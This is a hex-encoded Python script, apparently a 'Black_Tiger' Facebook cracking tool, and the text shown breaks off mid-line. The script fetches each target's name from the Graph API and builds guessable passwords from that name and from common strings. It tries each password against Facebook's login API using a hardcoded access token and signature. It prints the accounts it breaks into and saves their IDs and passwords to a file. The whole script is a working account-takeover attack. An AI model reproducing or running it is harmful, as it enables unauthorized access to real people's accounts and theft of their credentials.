6D3A205C3033335B313B39376D222B737472286C656E28696429290A09746974696B203D205B272E202020272C272E2E2020272C272E2E2E20275D0A09666F72206F20696E20746974696B3A0A09097072696E7428225C725C3033335B313B39376D5B2B5D5C3033335B313B33316D4861636B696E6720486173204265656E20537461727465645C3033335B313B39376D222B6F292C3B7379732E7374646F75742E666C75736828293B74696D652E736C65657028302E3035290A097072696E7420225C6E5C3033335B313B39376D5B2B5D5C7831625B313B33316D53746F702050726F63657373205072657373204354524C2B5A220A097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A20090A0909090A09646566206D61696E28617267293A0A0909676C6F62616C206F6B730A090975736572203D206172670A09097472793A0A0909096F732E6D6B64697228276F757427290A0909657863657074204F534572726F723A0A0909097061737320234465763A426C61636B54696765722D4572726F723430340A09097472793A090909090909090909090909090A09090961203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F272B757365722B272F3F6163636573735F746F6B656E3D272B746F6B6574290909090909090909090909090A09090962203D206A736F6E2E6C6F61647328612E74657874290909090909090909090909090A0909097061737331203D20625B2766697273745F6E616D65275D202B202731323334270909090909090909090909090A09090964617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737331292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A09090971203D206A736F6E2E6C6F61642864617461290909090909090909090909090A090909696620276163636573735F746F6B656E2720696E20713A0A0909090978203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A090909097A203D206A736F6E2E6C6F61647328782E74657874290A090909097072696E7420275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A090909097072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A090909097072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B207573657209090909090909090909090A090909097072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737331202B20275C6E2709090909090909090909090A090909096F6B732E617070656E6428757365722B7061737331290A202020202020202020202020202020202020202020202020656C73653A0A0909092020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A09090909202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A09090909202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B2062205B276E616D65275D0A09090909202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A09090909202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737331202B20275C6E270A090909092020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A090909092020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373312B225C6E22290A090909092020202063656B2E636C6F736528290A090909092020202063656B706F696E742E617070656E6428757365722B7061737331290A2020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090909202020207061737332203D20625B2766697273745F6E616D65275D202B202731323327090909090909090909090A20202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737332292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A09090920202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090909090909090A090909202020202020202020202020696620276163636573735F746F6B656E2720696E20713A090A0909090920202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A090909092020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909092020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A090909092020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A090909092020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B207573657209090909090909090A090909092020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737332202B20275C6E2709090909090909090909090A090909092020202020202020202020206F6B732E617070656E6428757365722B7061737332290A202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39336D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737332202B20275C6E270A0909090920202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373322B225C6E22290A0909090920202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373322909090909090909090A090909092020202020202020202020656C73653A09090909090909090909090A0909090909202020202020207061737333203D20625B276C6173745F6E616D65275D2B2731323327090909090909090909090A09090909092020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737333292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D33663535356639396662363166636437616130633434663538663532326566362229090909090909090909090A09090909092020202020202071203D206A736F6E2E6C6F6164286461746129090909090909090909090A090909090920202020202020696620276163636573735F746F6B656E2720696E20713A090A0909090909092020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909090909202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090A090909090909202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0909090909090909090A090909090909202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090909090909090A090909090909202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737333202B20275C6E270909090909090909090A090909090909202020202020206F6B732E617070656E6428757365722B7061737333290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737333202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373332B225C6E22290A0909090920202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B7061737333290909090909090909090A0909090909202020202020202020202020202020656C73653A090909090909090909090A09090909090920202020202020202020207061737334203D20625B2766697273745F6E616D65275D202B2027313132322709090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737334292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090909090909090A0909092020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A0909090909092020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B207573657209090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737334202B20275C6E2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737334290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737334202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373342B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373342909090909090A0909090909202020202020202020202020202020202020202020202020202020656C73653A0909090909090909090A09090909090920202020202020202020202020202020202020202020207061737335203D202737383637383627090909090909090A090909090909202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737335292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D3366353535663939666236316663643761613063343466353866353232656636222909090909090909090A090909090909202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F616428646174612909090909090909090A0909090909092020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A090A0909090909092020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39326D5B4F4B5D270909090909090A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D090909090909090A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B207573657209090909090A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737335202B20275C6E27090909090909090A090909090909202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B706173733529090A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737335202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373352B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373352909090909090A09090909090920202020202020202020202020202020202020202020202020202020202020656C73653A09090909090909090A090909090909092020202020202020202020202020202020202020202020202020207061737336203D202750616B697374616E2709090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737336292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090909090909090A0909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A090A090909090909090920202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737336202B20275C6E2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737336290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737336202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373362B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B706173733629090A09090909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A090909090909090A0909090909090909202020202020202020202020202020202020202020202020202020202020207061737337203D20625B2766697273745F6E616D65275D2B273132333435270909090909090A09090909090909092020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737337292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090A09090909090909092020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090A090909090909090920202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A09090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D2709090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737337202B20275C6E2709090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737337290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737337202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373372B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B706173733729202020202020202020202009090909090A0909090909090909202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0909090909090A090909090909090909092020202020202020202020202020202020202020202020202020207061737338203D2027303030373836270909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737338292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090909090909090A0909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A09090909090909090909202020202020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737338202B20275C6E2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737338290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39386D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020